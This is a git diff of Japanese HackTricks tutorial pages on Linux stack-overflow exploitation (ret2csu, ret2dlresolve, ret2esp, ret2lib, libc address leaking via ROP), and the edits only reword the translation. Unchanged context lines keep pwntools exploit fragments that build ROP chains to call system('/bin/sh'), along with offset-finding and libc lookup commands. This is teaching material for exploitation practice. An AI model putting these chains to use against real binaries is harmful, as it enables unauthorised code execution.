+++ b/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/README.md
@@ -9,7 +9,7 @@
 この上書きの主な問題は、**保存された命令ポインタ (EIP/RIP)** と**保存されたベースポインタ (EBP/RBP)** が前の関数に戻るために**スタックに保存されている**ことです。したがって、攻撃者はそれらを上書きし、**プログラムの実行フローを制御**できるようになります。
 
 この脆弱性は通常、関数が**スタックに割り当てられたバイト数よりも多くのバイトをコピーする**ために発生し、他のスタックの部分を上書きできるようになります。\
-これに脆弱な一般的な関数には、`strcpy`、`strcat`、`sprintf`、`gets`などがあります... また、長さ引数を取る`fgets`や`read`のような関数も、指定された長さが割り当てられたものより大きい場合に脆弱な方法で使用される可能性があります。
+このような脆弱性を持つ一般的な関数には、`strcpy`、`strcat`、`sprintf`、`gets`などがあります。また、長さ引数を取る`fgets`や`read`のような関数も、指定された長さが割り当てられたものより大きい場合に脆弱な方法で使用される可能性があります。
 
 例えば、以下の関数が脆弱である可能性があります：
 ```c
@@ -24,9 +24,9 @@ printf("You entered: %s\n", buffer);
 
 スタックオーバーフローを見つける最も一般的な方法は、非常に大きな入力の`A`（例：`python3 -c 'print("A"*1000)'`）を与え、**アドレス`0x41414141`にアクセスしようとしたことを示す`Segmentation Fault`を期待することです**。
 
-さらに、スタックオーバーフローの脆弱性があることがわかったら、**リターンアドレスを上書きするためのオフセットを見つける必要があります**。これには通常、**De Bruijn列**が使用されます。与えられたサイズ_k_のアルファベットと長さ_n_の部分列に対して、**長さ**_**n**_**のすべての可能な部分列がちょうど一度だけ連続した部分列として現れる**サイクリック列です。
+さらに、スタックオーバーフローの脆弱性があることがわかったら、**リターンアドレスを上書きするためのオフセットを見つける必要があります**。これには通常、**De Bruijn列**が使用されます。これは、サイズが_k_のアルファベットと長さ_n_の部分列に対して、**長さ**_**n**_**のすべての可能な部分列がちょうど1回ずつ連続した部分列として現れる**サイクリックシーケンスです。
 
-この方法により、手動でEIPを制御するために必要なオフセットを特定する代わりに、これらの列の1つをパディングとして使用し、上書きされたバイトのオフセットを見つけることが可能です。
+この方法により、手動でEIPを制御するために必要なオフセットを特定する代わりに、これらのシーケンスの1つをパディングとして使用し、上書きされたバイトのオフセットを見つけることができます。
 
 これには**pwntools**を使用することができます：
 ```python
@@ -72,7 +72,7 @@ stack-shellcode.md
 
 ## ROP
 
-この技術は、前述の技術に対する主要な保護を回避するための基本的なフレームワークです：**実行可能なスタックなし**（NX）。そして、既存の命令を悪用して任意のコマンドを実行する他のいくつかの技術（ret2lib、ret2syscall...）を実行することを可能にします：
+この技術は、前の技術の主要な保護を回避するための基本的なフレームワークです：**実行可能なスタックなし**（NX）。そして、既存の命令を悪用して任意のコマンドを実行する他のいくつかの技術（ret2lib、ret2syscall...）を実行することを可能にします：
 
 {{#ref}}
 rop-return-oriented-programing.md
diff --git a/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/pointer-redirecting.md b/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/pointer-redirecting.md
index 8d313ad4b..23e37b674 100644
--- a/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/pointer-redirecting.md
+++ b/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/pointer-redirecting.md
@@ -6,9 +6,9 @@
 
 関数呼び出しがスタックにある文字列のアドレスを使用する場合、バッファオーバーフローを悪用して**このアドレスを上書きし**、**バイナリ内の別の文字列のアドレスを置く**ことが可能です。
 
-例えば、**`system`** 関数呼び出しが**コマンドを実行するために文字列のアドレスを使用する**場合、攻撃者は**スタックに別の文字列のアドレスを置くことができ**、**`export PATH=.:$PATH`** とし、現在のディレクトリに**新しい文字列の最初の文字の名前のスクリプトを作成する**ことができます。これにより、バイナリによって実行されます。
+例えば、**`system`** 関数呼び出しが**コマンドを実行するために文字列のアドレスを使用する**場合、攻撃者は**スタックに別の文字列のアドレスを置くことができ**、**`export PATH=.:$PATH`** として、現在のディレクトリに**新しい文字列の最初の文字の名前のスクリプトを作成**することができます。これはバイナリによって実行されます。
 
-以下にこの例を示します：
+以下に例があります：
 
 - [https://github.com/florianhofhammer/stack-buffer-overflow-internship/blob/master/ASLR%20Smack%20and%20Laugh%20reference%20-%20Tilo%20Mueller/strptr.c](https://github.com/florianhofhammer/stack-buffer-overflow-internship/blob/master/ASLR%20Smack%20and%20Laugh%20reference%20-%20Tilo%20Mueller/strptr.c)
 - [https://guyinatuxedo.github.io/04-bof_variable/tw17_justdoit/index.html](https://guyinatuxedo.github.io/04-bof_variable/tw17_justdoit/index.html)
@@ -18,7 +18,7 @@
 
 文字列ポインタと同様ですが、関数に適用されます。**スタックに呼び出される関数のアドレスが含まれている**場合、**それを変更する**ことが可能です（例：**`system`**を呼び出すために）。
 
-以下にこの例を示します：
+以下に例があります：
 
 - [https://github.com/florianhofhammer/stack-buffer-overflow-internship/blob/master/ASLR%20Smack%20and%20Laugh%20reference%20-%20Tilo%20Mueller/funcptr.c](https://github.com/florianhofhammer/stack-buffer-overflow-internship/blob/master/ASLR%20Smack%20and%20Laugh%20reference%20-%20Tilo%20Mueller/funcptr.c)
 
diff --git a/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/ret2csu.md b/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/ret2csu.md
index bdd717cb5..77d969657 100644
--- a/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/ret2csu.md
+++ b/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/ret2csu.md
@@ -4,9 +4,9 @@
 
 ## 基本情報
 
-**ret2csu** は、プログラムを制御しようとする際に、プログラムの動作を操作するために通常使用する **gadgets** を見つけられない場合に使用されるハッキング技術です。&#x20;
+**ret2csu** は、プログラムを制御しようとする際に、通常使用する **gadgets** を見つけられない場合に使用されるハッキング技術です。&#x20;
 
-プログラムが特定のライブラリ（libcなど）を使用している場合、異なるプログラムの部分が互いに通信する方法を管理するためのいくつかの組み込み関数があります。これらの関数の中には、特に `__libc_csu_init` と呼ばれるものが、私たちの欠けているgadgetsとして機能する隠れた宝石があります。
+プログラムが特定のライブラリ（libcなど）を使用している場合、プログラムの異なる部分が互いに通信する方法を管理するためのいくつかの組み込み関数があります。これらの関数の中には、特に `__libc_csu_init` と呼ばれる、私たちの欠けているgadgetsとして機能する隠れた宝石があります。
 
 ### __libc_csu_init の魔法のガジェット
 
@@ -25,7 +25,7 @@ ret;
 このガジェットは、スタックから値をポップしてこれらのレジスタを制御することを可能にします。
 
 2. 2番目のシーケンスは、設定した値を使用していくつかのことを行います：
-- **特定の値を他のレジスタに移動**し、関数のパラメータとして使用できるようにします。
+- **特定の値を他のレジスタに移動し**、関数のパラメータとして使用できるようにします。
 - **r15とrbxの値を足し合わせ、rbxを8倍して**決定された場所にコールを実行します。
 ```
 mov rdx, r14;
@@ -35,12 +35,12 @@ call qword [r15 + rbx*8];
 ```
 ## 例
 
-システムコールを行うか、`write()`のような関数を呼び出したいが、`rdx`および`rsi`レジスタに特定の値をパラメータとして設定する必要があるとします。通常、これらのレジスタを直接設定するガジェットを探しますが、見つかりません。
+システムコールを行うか、`write()`のような関数を呼び出したいが、`rdx`と`rsi`レジスタに特定の値をパラメータとして必要とする場合を想像してください。通常、これらのレジスタを直接設定するガジェットを探しますが、見つかりません。
 
 ここで**ret2csu**が登場します：
 
-1. **レジスタの設定**: 最初のマジックガジェットを使用して、スタックから値をポップしてrbx、rbp、r12（edi）、r13（rsi）、r14（rdx）、およびr15に入れます。
-2. **2番目のガジェットを使用**: これらのレジスタが設定されたら、2番目のガジェットを使用します。これにより、選択した値を`rdx`および`rsi`（それぞれr14およびr13から）に移動させ、関数呼び出しのためのパラメータを準備します。さらに、`r15`と`rbx`を制御することで、計算したアドレスにある関数を呼び出すようにプログラムを作成し、`[r15 + rbx*8]`に配置することができます。
+1. **レジスタの設定**: 最初のマジックガジェットを使用して、スタックから値をポップし、rbx、rbp、r12（edi）、r13（rsi）、r14（rdx）、r15に入れます。
+2. **2番目のガジェットを使用**: これらのレジスタが設定されたら、2番目のガジェットを使用します。これにより、選択した値を`rdx`と`rsi`（それぞれr14とr13から）に移動させ、関数呼び出しのためのパラメータを準備します。さらに、`r15`と`rbx`を制御することで、計算したアドレスにある関数を呼び出すようにプログラムを作成し、`[r15 + rbx*8]`に配置することができます。
 
 この技術を使用した[**例とその説明はこちら**](https://ir0nstone.gitbook.io/notes/types/stack/ret2csu/exploitation)で、これが使用された最終的なエクスプロイトです：
 ```python
diff --git a/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/ret2dlresolve.md b/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/ret2dlresolve.md
index f7059b631..efdf51fa8 100644
--- a/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/ret2dlresolve.md
+++ b/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/ret2dlresolve.md
@@ -13,15 +13,15 @@
 通常、これらの構造体は、書き込み可能なメモリ上で**`read`**を呼び出す**初期ROPチェーンを作成することによって偽造され、その後**構造体**と文字列**`'/bin/sh'`**が既知の場所に読み込まれるように渡され、次にROPチェーンは**`_dl_runtime_resolve`**を呼び出すことで続きます。
 
 > [!TIP]
-> この技術は、特にシステムコールガジェットがない場合（[**ret2syscall**](rop-syscall-execv.md)や[SROP](srop-sigreturn-oriented-programming.md)などの技術を使用するため）やlibcアドレスを漏洩する方法がない場合に便利です。
+> この技術は、特にシステムコールガジェットがない場合（[**ret2syscall**](rop-syscall-execv.md)や[SROP](srop-sigreturn-oriented-programming.md)などの技術を使用するため）やlibcアドレスを漏洩させる方法がない場合に便利です。
 
-この技術に関するより良い説明は、ビデオの後半で見つけることができます：
+この技術についてのより良い説明は、ビデオの後半で見つけることができます：
 
 {% embed url="https://youtu.be/ADULSwnQs-s?feature=shared" %}
 
 ## 構造体
 
-3つの構造体を偽造する必要があります：**`JMPREL`**、**`STRTAB`**、および**`SYMTAB`**。これらの構造体がどのように構築されるかについてのより良い説明は、[https://ir0nstone.gitbook.io/notes/types/stack/ret2dlresolve#structures](https://ir0nstone.gitbook.io/notes/types/stack/ret2dlresolve#structures)にあります。
+3つの構造体を偽造する必要があります：**`JMPREL`**、**`STRTAB`**、および**`SYMTAB`**。これらがどのように構築されるかについてのより良い説明は、[https://ir0nstone.gitbook.io/notes/types/stack/ret2dlresolve#structures](https://ir0nstone.gitbook.io/notes/types/stack/ret2dlresolve#structures)にあります。
 
 ## 攻撃の概要
 
diff --git a/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/ret2esp-ret2reg.md b/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/ret2esp-ret2reg.md
index 66596e126..a4277ecf9 100644
--- a/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/ret2esp-ret2reg.md
+++ b/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/ret2esp-ret2reg.md
@@ -6,13 +6,13 @@
 
 **ESP（スタックポインタ）が常にスタックの最上部を指しているため**、この技術はEIP（命令ポインタ）を**`jmp esp`**または**`call esp`**命令のアドレスで置き換えることを含みます。これにより、シェルコードは上書きされたEIPのすぐ後に配置されます。`ret`命令が実行されると、ESPは次のアドレスを指し、正確にシェルコードが格納されている場所になります。
 
-**アドレス空間配置のランダム化（ASLR）**がWindowsまたはLinuxで有効でない場合、共有ライブラリに見つかる`jmp esp`または`call esp`命令を使用することが可能です。しかし、[**ASLR**](../common-binary-protections-and-bypasses/aslr/)が有効な場合、これらの命令を見つけるために脆弱なプログラム自体を調べる必要があるかもしれません（そして、[**PIE**](../common-binary-protections-and-bypasses/pie/)を回避する必要があるかもしれません）。
+**アドレス空間配置のランダム化（ASLR）**がWindowsまたはLinuxで有効でない場合、共有ライブラリに見つかる`jmp esp`または`call esp`命令を使用することが可能です。しかし、[**ASLR**](../common-binary-protections-and-bypasses/aslr/)が有効な場合、これらの命令を見つけるために脆弱なプログラム自体を調べる必要があるかもしれません（そして、[**PIE**](../common-binary-protections-and-bypasses/pie/)を打破する必要があるかもしれません）。
 
-さらに、シェルコードを**EIPの破損の後に配置できる**ことは、関数の操作中に実行される`push`または`pop`命令がシェルコードに干渉しないことを保証します。この干渉は、シェルコードが関数のスタックの中間に配置されている場合に発生する可能性があります。
+さらに、EIPの破損の**後にシェルコードを配置できる**ことは、関数の操作中に実行される`push`または`pop`命令がシェルコードに干渉しないことを保証します。この干渉は、シェルコードが関数のスタックの中間に配置されている場合に発生する可能性があります。
 
-### スペースが不足している場合
+### スペース不足
 
-RIPを上書きした後に書き込むスペースが不足している場合（おそらく数バイトだけ）、次のような初期の`jmp`シェルコードを書きます:
+RIPを上書きした後に書くスペースが不足している場合（おそらく数バイトだけ）、初期の`jmp`シェルコードを書いてください:
 ```armasm
 sub rsp, 0x30
 jmp rsp
@@ -51,7 +51,7 @@ p.interactive()
 
 ## 保護
 
-- [**NX**](../common-binary-protections-and-bypasses/no-exec-nx.md): スタックが実行可能でない場合、シェルコードをスタックに配置して実行する必要があるため、これは役に立ちません。
+- [**NX**](../common-binary-protections-and-bypasses/no-exec-nx.md): スタックが実行可能でない場合、シェルコードをスタックに配置して実行するためにジャンプする必要があるため、これは役に立ちません。
 - [**ASLR**](../common-binary-protections-and-bypasses/aslr/) & [**PIE**](../common-binary-protections-and-bypasses/pie/): これらはespや他のレジスタにジャンプする命令を見つけるのを難しくする可能性があります。
 
 ## 参考文献
diff --git a/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/ret2lib/README.md b/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/ret2lib/README.md
index b1bd2f1e0..df607d55b 100644
--- a/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/ret2lib/README.md
+++ b/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/ret2lib/README.md
@@ -13,7 +13,7 @@
 
 ## アドレスの特定
 
-- 現在のマシンで使用されている`libc`がどこにメモリにロードされるかを見つけるには、次のコマンドを使用します：
+- 現在のマシンから使用されている`libc`がどこにメモリにロードされるかを見つけるには、次のコマンドを使用します：
 ```bash
 ldd /path/to/executable | grep libc.so.6 #Address (if ASLR, then this change every time)
 ```
@@ -31,7 +31,7 @@ strings -a -t x /lib/i386-linux-gnu/libc.so.6 | grep /bin/sh
 ```
 ### gdb-peda / GEFの使用
 
-使用されているlibcを知っていると、PedaやGEFを使って**system**関数、**exit**関数、そして文字列**`/bin/sh`**のアドレスを取得することも可能です：
+使用されているlibcを知っていると、PedaまたはGEFを使用して**system**関数、**exit**関数、および文字列**`/bin/sh`**のアドレスを取得することも可能です：
 ```
 p system
 p exit
@@ -39,7 +39,7 @@ find "/bin/sh"
 ```
 ### /proc/\<PID>/mapsの使用
 
-プロセスが**子プロセス**を作成するたびに（ネットワークサーバーと話すとき）、そのファイルを**読み取る**ことを試みてください（おそらくroot権限が必要です）。
+プロセスが**子プロセス**を作成するたびに（ネットワークサーバー）それと対話する場合、そのファイルを**読み取る**ことを試みてください（おそらくroot権限が必要です）。
 
 ここでは、プロセス内で**libcがどこにロードされているか**、およびプロセスのすべての子プロセスに対して**どこにロードされるか**を正確に見つけることができます。
 
@@ -97,7 +97,7 @@ c.interactive()
 ```
 ## x64 Ret2lib コード例
 
-Check the example from:
+次の例を確認してください:
 
 {{#ref}}
 ../rop-return-oriented-programing.md
@@ -109,7 +109,7 @@ Check the example from:
 
 ## Ret2printf
 
-これは基本的に、`ret2lib` を使用して `printf` フォーマット文字列の脆弱性に変換するために **Ret2libを悪用する** ことを意味します（無駄に思えるかもしれませんが可能です）：
+これは基本的に、**Ret2libを悪用して`printf`フォーマット文字列の脆弱性に変換する** ことを意味します。`ret2lib`を使用してprintfを呼び出し、悪用する値を渡します（無駄に思えるかもしれませんが可能です）:
 
 {{#ref}}
 ../../format-strings/
@@ -118,12 +118,12 @@ Check the example from:
 ## その他の例と参考文献
 
 - [https://guyinatuxedo.github.io/08-bof_dynamic/csaw19_babyboi/index.html](https://guyinatuxedo.github.io/08-bof_dynamic/csaw19_babyboi/index.html)
-- Ret2lib、libc内の関数のアドレスへの漏洩を考慮し、one gadgetを使用
+- Ret2lib、libc内の関数のアドレスを漏洩させるために、one gadgetを使用
 - [https://guyinatuxedo.github.io/08-bof_dynamic/csawquals17_svc/index.html](https://guyinatuxedo.github.io/08-bof_dynamic/csawquals17_svc/index.html)
-- 64ビット、ASLR有効だがPIEなし、最初のステップはカナリアのバイト0x00までオーバーフローを埋めてからputsを呼び出し、漏洩させる。カナリアを使ってROPガジェットを作成し、putsのGOTからのアドレスを漏洩させるためにputsを呼び出し、次に `system('/bin/sh')` を呼び出すROPガジェット。
+- 64ビット、ASLRが有効だがPIEなし、最初のステップはカナリアのバイト0x00までオーバーフローを埋めてからputsを呼び出し、漏洩させることです。カナリアを使ってROPガジェットを作成し、putsを呼び出してGOTからputsのアドレスを漏洩させ、次に`system('/bin/sh')`を呼び出すROPガジェットを作成します。
 - [https://guyinatuxedo.github.io/08-bof_dynamic/fb19_overfloat/index.html](https://guyinatuxedo.github.io/08-bof_dynamic/fb19_overfloat/index.html)
-- 64ビット、ASLR有効、カナリアなし、子関数からのメインでのスタックオーバーフロー。ROPガジェットを使用してputsを呼び出し、GOTからputsのアドレスを漏洩させ、その後one gadgetを呼び出す。
+- 64ビット、ASLRが有効、カナリアなし、子関数からのメインでのスタックオーバーフロー。ROPガジェットを使ってputsを呼び出し、GOTからputsのアドレスを漏洩させ、その後one gadgetを呼び出します。
 - [https://guyinatuxedo.github.io/08-bof_dynamic/hs19_storytime/index.html](https://guyinatuxedo.github.io/08-bof_dynamic/hs19_storytime/index.html)
-- 64ビット、PIEなし、カナリアなし、relroなし、nx。write関数を使用してwrite（libc）のアドレスを漏洩させ、one gadgetを呼び出す。
+- 64ビット、PIEなし、カナリアなし、relroなし、nx。write関数を使用してwrite（libc）のアドレスを漏洩させ、one gadgetを呼び出します。
 
 {{#include ../../../../banners/hacktricks-training.md}}
diff --git a/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/ret2lib/rop-leaking-libc-address/README.md b/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/ret2lib/rop-leaking-libc-address/README.md
index d181fb24d..be7c3457d 100644
--- a/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/ret2lib/rop-leaking-libc-address/README.md
+++ b/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/ret2lib/rop-leaking-libc-address/README.md
@@ -1,15 +1,15 @@
-# ROPを使用したlibcアドレスの漏洩
+# ROPを使用したlibcアドレスのリーク
 
 {{#include ../../../../../banners/hacktricks-training.md}}
 
 ## 簡単な要約
 
-1. **オーバーフローの** オフセットを **見つける**
-2. **`POP_RDI` ガジェット、`PUTS_PLT`、および `MAIN` を** 見つける
-3. 前のガジェットを使用して **puts または他のlibc関数のメモリアドレスを漏洩し、** **libcのバージョンを見つける** ([donwload it](https://libc.blukat.me))
+1. **オーバーフローの**オフセットを**見つける**
+2. **`POP_RDI`ガジェット、`PUTS_PLT`、および`MAIN`を**見つける**
+3. 前のガジェットを使用して**putsまたは他のlibc関数のメモリアドレスをリークし、**libcのバージョンを**見つける**（[donwload it](https://libc.blukat.me)）
 4. ライブラリを使用して、**ROPを計算し、エクスプロイトする**
 
-## 練習用の他のチュートリアルとバイナリ
+## 実践するための他のチュートリアルとバイナリ
 
 このチュートリアルは、次のチュートリアルで提案されたコード/バイナリをエクスプロイトします: [https://tasteofsecurity.com/security/ret2libc-unknown-libc/](https://tasteofsecurity.com/security/ret2libc-unknown-libc/)\
 他の有用なチュートリアル: [https://made0x78.com/bseries-ret2libc/](https://made0x78.com/bseries-ret2libc/), [https://guyinatuxedo.github.io/08-bof_dynamic/csaw19_babyboi/index.html](https://guyinatuxedo.github.io/08-bof_dynamic/csaw19_babyboi/index.html)
@@ -43,7 +43,7 @@ rop-leaking-libc-template.md
 
 ## 1- オフセットの特定
 
-テンプレートは、エクスプロイトを続行する前にオフセットが必要です。提供された場合は、必要なコードを実行してそれを見つけます（デフォルトでは `OFFSET = ""`）：
+テンプレートはエクスプロイトを続行する前にオフセットが必要です。提供された場合は、必要なコードを実行してそれを見つけます（デフォルトでは `OFFSET = ""`）：
 ```bash
 ###################
 ### Find offset ###
@@ -58,21 +58,21 @@ r.sendline(payload)
 #cyclic_find(0x6161616b) # Find the offset of those bytes
 return
 ```
-**実行** `python template.py` を入力すると、プログラムがクラッシュした状態でGDBコンソールが開きます。その**GDBコンソール**内で `x/wx $rsp` を実行して、RIPを上書きする予定の**バイト**を取得します。最後に、**python**コンソールを使用して**オフセット**を取得します:
+**実行** `python template.py` を入力すると、クラッシュしたプログラムが開かれた **GDB コンソール** が表示されます。その **GDB コンソール** 内で `x/wx $rsp` を実行して、RIP を上書きしようとしている **バイト** を取得します。最後に、**python** コンソールを使用して **オフセット** を取得します:
 ```python
 from pwn import *
 cyclic_find(0x6161616b)
 ```
 ![](<../../../../../images/image (140).png>)
 
-オフセットを見つけたら（この場合は40）、その値を使ってテンプレート内のOFFSET変数を変更します。\
+オフセット（この場合は40）を見つけたら、その値を使ってテンプレート内のOFFSET変数を変更します。\
 `OFFSET = "A" * 40`
 
 別の方法としては、`pattern create 1000` -- _retまで実行_ -- `pattern seach $rsp`をGEFから使用することです。
 
 ## 2- ガジェットの発見
 
-次に、バイナリ内のROPガジェットを見つける必要があります。このROPガジェットは、使用されている**libc**を見つけるために`puts`を呼び出すのに役立ち、後で**最終的なエクスプロイトを実行**するために使用されます。
+次に、バイナリ内のROPガジェットを見つける必要があります。このROPガジェットは、**libc**を見つけるために`puts`を呼び出すのに役立ち、後で**最終的なエクスプロイトを実行する**ために使用されます。
 ```python
 PUTS_PLT = elf.plt['puts'] #PUTS_PLT = elf.symbols["puts"] # This is also valid to call puts
 MAIN_PLT = elf.symbols['main']
@@ -83,15 +83,15 @@ log.info("Main start: " + hex(MAIN_PLT))
 log.info("Puts plt: " + hex(PUTS_PLT))
 log.info("pop rdi; ret  gadget: " + hex(POP_RDI))
 ```
-`PUTS_PLT` は **function puts** を呼び出すために必要です。\
-`MAIN_PLT` は **exploit** のために **overflow** を **again** 行うために、1回のインタラクションの後に **main function** を再度呼び出すために必要です（無限のエクスプロイトのラウンド）。 **各 ROP の最後でプログラムを再度呼び出すために使用されます**。\
-**POP_RDI** は呼び出された関数に **parameter** を **pass** するために必要です。
+`PUTS_PLT`は**function puts**を呼び出すために必要です。\
+`MAIN_PLT`は、**exploit**のオーバーフローを**再度**行うために、1回のインタラクションの後に**main function**を再度呼び出すために必要です（無限のエクスプロイトのラウンド）。**各ROPの最後にプログラムを再度呼び出すために使用されます**。\
+**POP_RDI**は、呼び出された関数に**parameter**を**pass**するために必要です。
 
-このステップでは、pwntools が実行中にすべてを見つけるため、何も実行する必要はありません。
+このステップでは、pwntoolsが実行中にすべてを見つけるため、何も実行する必要はありません。
 
-## 3- libc ライブラリの発見
+## 3- libcライブラリの特定
 
-今はどのバージョンの **libc** ライブラリが使用されているかを見つける時です。そうするために、**function** `puts` のメモリ内の **address** を **leak** し、そのアドレスにある puts バージョンがどの **library version** にあるかを **search** します。
+今は、どのバージョンの**libc**ライブラリが使用されているかを見つける時です。これを行うために、**function** `puts`のメモリ内の**address**を**leak**し、そのアドレスにあるputsのバージョンがどの**library version**にあるかを**search**します。
 ```python
 def get_addr(func_name):
 FUNC_GOT = elf.got[func_name]
@@ -125,15 +125,15 @@ p.interactive()
 rop1 = OFFSET + p64(POP_RDI) + p64(FUNC_GOT) + p64(PUTS_PLT) + p64(MAIN_PLT)
 ```
 これにより、**RIP**を**上書き**することが可能になるまでいくつかのバイトが送信されます: `OFFSET`。\
-次に、ガジェット`POP_RDI`の**アドレス**を設定し、次のアドレス（`FUNC_GOT`）が**RDI**レジスタに保存されます。これは、`PUTS_GOT`の**アドレス**を渡して**putsを呼び出す**ためです。なぜなら、puts関数のメモリ内のアドレスは`PUTS_GOT`が指すアドレスに保存されているからです。\
-その後、`PUTS_PLT`が呼び出され（**RDI**内に`PUTS_GOT`がある状態で）、putsは`PUTS_GOT`内の**内容を読み取り**（**メモリ内のputs関数のアドレス**）、それを**出力します**。\
+次に、ガジェット`POP_RDI`の**アドレス**を設定し、次のアドレス（`FUNC_GOT`）が**RDI**レジスタに保存されます。これは、`PUTS_GOT`の**アドレス**を渡して**putsを呼び出す**ためです。puts関数のメモリ内のアドレスは`PUTS_GOT`が指すアドレスに保存されています。\
+その後、`PUTS_PLT`が呼び出され（**RDI**内に`PUTS_GOT`がある状態で）、putsは`PUTS_GOT`内の**内容を読み取ります**（**メモリ内のputs関数のアドレス**）そしてそれを**出力します**。\
 最後に、**main関数が再度呼び出され**、オーバーフローを再度利用できるようになります。
 
-この方法で、**puts関数を騙して**、**メモリ内の**関数**putsのアドレス**（**libc**ライブラリ内）を**出力させました**。今、そのアドレスがあるので、**使用されているlibcのバージョンを検索できます**。
+この方法で、**puts関数を騙して**、**メモリ内のputs関数の**アドレス（**libc**ライブラリ内）を**出力させました**。そのアドレスがわかったので、**どのlibcバージョンが使用されているかを検索できます**。
 
 ![](<../../../../../images/image (141).png>)
 
-**ローカル**バイナリを**利用している**ため、どのバージョンの**libc**が使用されているかを特定する必要はありません（ただし、`/lib/x86_64-linux-gnu/libc.so.6`でライブラリを見つけてください）。\
+**ローカル**バイナリを**エクスプロイト**しているため、どのバージョンの**libc**が使用されているかを特定する必要はありません（ただし、`/lib/x86_64-linux-gnu/libc.so.6`でライブラリを見つけてください）。\
 しかし、リモートエクスプロイトの場合、ここでどのように見つけるかを説明します：
 
 ### 3.1- libcバージョンの検索 (1)
@@ -151,8 +151,8 @@ rop1 = OFFSET + p64(POP_RDI) + p64(FUNC_GOT) + p64(PUTS_PLT) + p64(MAIN_PLT)
 - `$ cd libc-database`
 - `$ ./get`
 
-これには少し時間がかかるので、辛抱してください。\
-これが機能するためには、次が必要です：
+これには少し時間がかかりますので、辛抱してください。\
+これを機能させるためには、次が必要です：
 
 - Libcシンボル名: `puts`
 - 漏洩したlibcアドレス: `0x7ff629878690`
@@ -174,7 +174,7 @@ Getting libc6_2.23-0ubuntu10_amd64
 ```
 `libs/libc6_2.23-0ubuntu10_amd64/libc-2.23.so` から libc を作業ディレクトリにコピーします。
 
-### 3.3- リークする他の関数
+### 3.3- 漏洩させる他の関数
 ```python
 puts
 printf
@@ -197,9 +197,9 @@ libc.address = leak - libc.symbols[func_name] #Save libc base
 log.info("libc base @ %s" % hex(libc.address))
 ```
 > [!NOTE]
-> 最終的なlibcベースアドレスは**00で終わる必要があります**。そうでない場合は、間違ったライブラリが漏洩した可能性があります。
+> 最終的なlibcベースアドレスは**00で終わる必要があります**。そうでない場合は、誤ったライブラリを漏洩した可能性があります。
 
-次に、関数`system`のアドレスと**文字列**_"/bin/sh"_の**アドレス**は、**libc**の**ベースアドレス**から**計算**され、**libcライブラリ**が与えられます。
+次に、関数`system`のアドレスと文字列_"/bin/sh"_の**アドレス**は、**libcのベースアドレス**から**計算**され、**libcライブラリ**が与えられます。
 ```python
 BINSH = next(libc.search("/bin/sh")) - 64 #Verify with find /bin/sh
 SYSTEM = libc.sym["system"]
@@ -219,10 +219,10 @@ p.sendline(rop2)
 p.interactive() #Interact with the conenction
 ```
 この最終的なROPについて説明しましょう。\
-最後のROP（`rop1`）は再びmain関数を呼び出しました。次に、再度**overflow**を**exploit**することができます（だから`OFFSET`がここに再びあります）。次に、`POP_RDI`を呼び出して**"/bin/sh"**の**アドレス**（`BINSH`）を指し、**system**関数（`SYSTEM`）を呼び出します。なぜなら、**"/bin/sh"**のアドレスがパラメータとして渡されるからです。\
+最後のROP（`rop1`）は再びmain関数を呼び出しました。次に、**再び** **オーバーフロー**を**悪用**することができます（だから`OFFSET`がここに再びあります）。次に、`POP_RDI`を呼び出して**"/bin/sh"**の**アドレス**（`BINSH`）を指し、**system**関数（`SYSTEM`）を呼び出します。なぜなら、**"/bin/sh"**のアドレスがパラメータとして渡されるからです。\
 最後に、**exit関数のアドレス**が**呼び出され**、プロセスが**正常に終了**し、アラートが生成されません。
 
-**この方法で、exploitは\_/bin/sh**\_\*\*シェルを実行します。*\*
+**この方法で、エクスプロイトは\_/bin/sh**\_\*\*シェルを実行します。*\*
 
 ![](<../../../../../images/image (143).png>)
 
@@ -246,9 +246,9 @@ rop-leaking-libc-template.md
 
 ## Common problems
 
-### MAIN_PLT = elf.symbols\['main'] が見つかりません
+### MAIN_PLT = elf.symbols\['main'] not found
 
-"main" シンボルが存在しない場合、メインコードの場所を見つけることができます：
+"main"シンボルが存在しない場合、メインコードの場所を見つけることができます：
 ```python
 objdump -d vuln_binary | grep "\.text"
 Disassembly of section .text:
diff --git a/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/ret2lib/rop-leaking-libc-address/rop-leaking-libc-template.md b/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/ret2lib/rop-leaking-libc-address/rop-leaking-libc-template.md
index d0444bcba..68029b7ff 100644
--- a/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/ret2lib/rop-leaking-libc-address/rop-leaking-libc-template.md
+++ b/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/ret2lib/rop-leaking-libc-address/rop-leaking-libc-template.md
@@ -186,7 +186,7 @@ P.interactive() #Interact with your shell :)
 
 ## MAIN_PLT = elf.symbols\['main'] が見つかりません
 
-"main" シンボルが存在しない場合（おそらくストリップされたバイナリのため）、メインコードがどこにあるかを確認できます:
+「main」シンボルが存在しない場合（おそらくストリップされたバイナリのため）、メインコードがどこにあるかを確認できます:
